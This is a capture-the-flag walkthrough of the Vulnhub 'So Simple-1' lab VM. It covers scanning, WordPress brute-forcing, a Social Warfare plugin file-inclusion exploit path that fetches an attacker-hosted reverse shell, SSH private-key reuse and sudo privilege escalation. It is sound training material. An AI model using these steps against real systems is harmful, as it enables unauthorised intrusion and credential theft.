So Simple-1 Vulnhub Walkthrough
Description From Vulnhub
This is an easy level VM with some rabbit holes. Enumeration is key to find your way in. There are three flags (2 users and 1 root flag). The VM is tested on Virtualbox. After the startup, it shows the IP address.
Once again I am here with another walkthrough of the Vuernarable machine from Vulnhub.com. Credit for developing this machine goes to @roelvb79. For me, it took around 30–35 minutes to crack the machine as I am a bit of Lazzy. Download it from https://www.vulnhub.com/entry/so-simple-1,515/
My recommendation for solving this machine is on Virtualbox but as stated “Curiosity keeps leading us down new paths — Walt Disney” So, you can try VMware, also you can redo the challenge and find your own way gaining root access.
For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. There are a lot of other challenging CTF machines available on vulnhub.com and I highly suggest attempting them, as it is a good way to sharpen your skills and also learn new techniques in a safe environment.
Starting the Journey
Network Scanning
A network scan is the most basic scan in its aims. Essentially a network scan is used to determine where live systems are on the network and how many of them there is and for doing so I generally prefer to use netdiscover command.
Look’s like I got my target 10.0.2.34
Port Scanning
Port scans go a bit deeper than network scans and provide not only a map of the target but also a list of open ports and services running on a host. This provides a higher resolution map than the network scan. Generally, the preferred tool for carrying out a port scan is Nmap but, one can use hping3 to do the same.
….and here we go only two ports are open. If you want to learn about Nmap you can visit my previous walkthrough https://medium.com/@Shubham_Singh_/photographer-1-vulnhub-walkthrough-e7c1f3a5dde7
RECONNAISSANCE PHASE
Reconnaissance, also known as the preparatory phase, is where the hacker gathers information about a target before launching an attack and is completed in phases prior to exploiting system vulnerabilities. What we are going to do here is, we will try to investigate each opened port for available venerability. So, Let’s start…
Web Reconnaissance
As usual, I first visited the port 80 which is the easy one but no valuable information found there. I then ran a dirb scan to see if there any hidden directories present or not and yes, this time I was lucky. The site was developed using WordPress as a CMS. Let’s run a Wpscan against it…
WordPress Scanning
WordPress scanning is carried out to see whether the plugins used by the site are updated or not. If any of the plugins are out-dated then we should check for the present vulnerability.
For this particular scan, you have to get your own API key from https://wpvulndb.com/api register to get your api-token and limited scan/day.
The wpscan identifies the user’s admin and max and one plugin social warfare v3.5.0 which has two vulnerabilities as shown.
Now we have to again run a wpscan but this time the brute force password attack Like this…
I recommend using the rockyou.txt wordlist file.
After the scan, we are able to get the user’s max password as opensesame. Time to log-in to the wp-admin login page. The max account doesn’t contain any valuable information for us. Then, I tried searching for any available vulnerability for plugin social warfare using Searchsploit and I got this
You can Google also and you will get the same in the exploit-db page. Now open the exploit page and you will get a Vulpath "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s".
Copy the path and paste it in the URL section of user max account and you will get a screen like this
Now, this is the path from where we will get the reverse connection.
Steps for getting the reverse Connection
- Create a file with any_name and save it in .txt format.
- Go to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and copy the bash reverse shell script in the created file.
- Change the IP_address according to your Kali IP and desired port to listen for a connection.
- Start a local server inside your current working directory like this…
5. Open another terminal to listen for incoming connection using Netcat
6. Go to the Vulpath and in the place of %s type http://[kali_ip_address:server_port/created_file.txt]
7. Open your listening terminal and wait for the reverse connection
We did it now time to navigate to the home directory and you will find the user’s max and steven folder. Enter into the max folder and we got the user1.txt file but unable to open it 😞
Check for the folder’s permission and we can clearly see that we can access the .SSH folder. We found the id_rsa file inside it which seems like the Private key for SSH login for user max.
Copy the Private key and create a file and paste this. Give the permission of 600 for this file to avoided any error.
SSH LOGIN
SSH login can be done in various ways but since we have the Private key we will use this for the log-in process.
Logged in successfully!!! Now use the cat command for viewing the contents of file user1.txt and we got our first flag 🤘 time to get the next.
Check for the sudo permission of the max user and the user can run this as sudo
Searching the web shows that we can exploit the service process for privilege escalation to get access as another user.
Go to the https://gtfobins.github.io/gtfobins/service/#sudo site and copy the sudo command for privilege escalation and enter the famous python script to get the proper interactive shell….
…and we logged-in successfully as steven. Our second flag is here access it using cat user2.txt😈
Now again check for the sudo permission for user steven for checking if he can run any file as sudo or not.
Running the command shows that he can run server-health.sh as root in /opt/tools path. Navigating to the opt directory I find that there is no folder named tools. Seem’s like we have to create one by using mkdir tools.
Now create a file having the name server-health.sh inside the tools folder and open it using nano. Enter the script as shown below…
…save it and provide the executable permission using the chmod command.
Finally, run the file using sudo command as root user providing the full path
and here we go, we got the root access. Now navigate to the root directory for the final flag ✌️
For more walkthroughs stay tuned…
Before you go
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share it to help others with similar interests! + Feedback is always welcome!
